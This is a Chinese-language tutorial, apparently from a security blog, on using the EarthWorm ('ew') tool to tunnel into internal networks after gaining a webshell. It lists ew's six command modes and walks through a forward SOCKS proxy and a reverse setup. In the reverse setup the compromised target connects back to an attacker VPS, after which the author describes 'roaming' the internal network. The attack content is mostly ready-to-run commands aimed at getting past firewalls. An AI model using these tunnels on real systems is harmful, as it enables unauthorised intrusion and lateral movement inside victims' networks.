0x00前言 这章我们将学习如何通过一个webshell,进行内网穿透呢,就是要用到下面的工具earthworm,业内称为ew内网神器 0x00 EW神器介绍 EW 是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 这个工具开发的团队考虑到工具的杀伤性非常强,然后永久停止了更新,以下是一张示意图 该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux均被包括其内 0x01 EW的使用方法 该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 ./ew -s ssocksd -l 1080 //开启正向socks服务 ./ew -s rcsocks -l 1080 -e 8888 //监听1080端口,1080接收的数据通过8888交互传递 ./ew -s rssocks -d rev_ip -e 8888 //开启反向socks服务。反向连接rev_ip的8888端口 ./ew -s lcx_listen -l 1080 -e 8888 //监听1080端口,1080接收的数据通过8888交互传递 ./ew -s lcx_tran -l 1080 -f forward_ip -g8888 //监听1080端口,1080接收的数据正向传给forward_ip的8888端口 ./ew -s lcx_slave -d vps_ip -e 8888 -f B_ip-g 9999 //作为中间角色,反向连接vps的8888,正向连接B的9999。打通两者 0x02EW实战内网穿透 1. 正向 SOCKS v5 服务器(目标系统在公网)上传了EW神器,通过指定参数启动正向代理并设置好代理的1111端口
通过一个socks代理连接工具,直接这个正向代理服务器即可
然后测试代理的可用性和延迟性,即可进行正向代理
2.反向 sock v5服务器(目标系统在内网,能出网)通过拿到服务器的webshell,上传了EarthWorm内网穿透工具
首先在公网的VPS上执行./ew_for_linx64 -s rcsocks -l 2222 -e 1111 接受2222端口的数据并转发到1111端口,此时正处在监听的状态
在目标服务器执行./ew -s rssocks -d vps-ip -e 1111 ,并反弹到公网主机的1111端口
可以看到目标服务器成功反弹到公网的vps上,建立了反向代理
通过连接vps-IP的2222端口,测试反向代理的连接和延迟都正常
测试是可以把目标系统内网直接代理出来的,就可以开始愉快的内网漫游了
如果目标不出网,那就通过能出网的服务器建立代理中转,直到可以访问到不出网的服务器 |